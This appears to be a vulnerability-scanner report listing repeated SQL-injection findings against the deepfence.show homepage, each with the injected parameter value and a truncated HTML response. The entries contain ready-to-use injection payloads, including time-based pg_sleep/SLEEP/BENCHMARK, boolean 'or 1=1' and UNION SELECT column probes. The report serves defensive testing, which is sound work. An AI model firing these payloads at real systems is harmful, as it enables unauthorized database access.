href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1638\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# 1)) or pg_sleep(5)--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#CWE-ID CWE-89\nIssue Number #1639\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# \" OR \"\" = \"\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1640\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),3,4#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1641\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK\n(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1642\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/Request GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# admin' or 1=1/*\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1643\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION SELECT @@VERSION,SLEEP(5),USER(),\nBENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...Alerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1644\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1645\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5,6,7--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: Response is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1646\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1647Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION SELECT @@VERSION,SLEEP(5),USER(),\nBENCHMARK(1000000,MD5('A')),\n5,6,7,8,9,10,11,12,13,14,15,16,17,18\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1648\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget script --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1649\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1650\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GETModified \nParametersName Value\nDemoUser1# UNION SELECT @@VERSION,SLEEP(5),USER(),\nBENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1651\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" 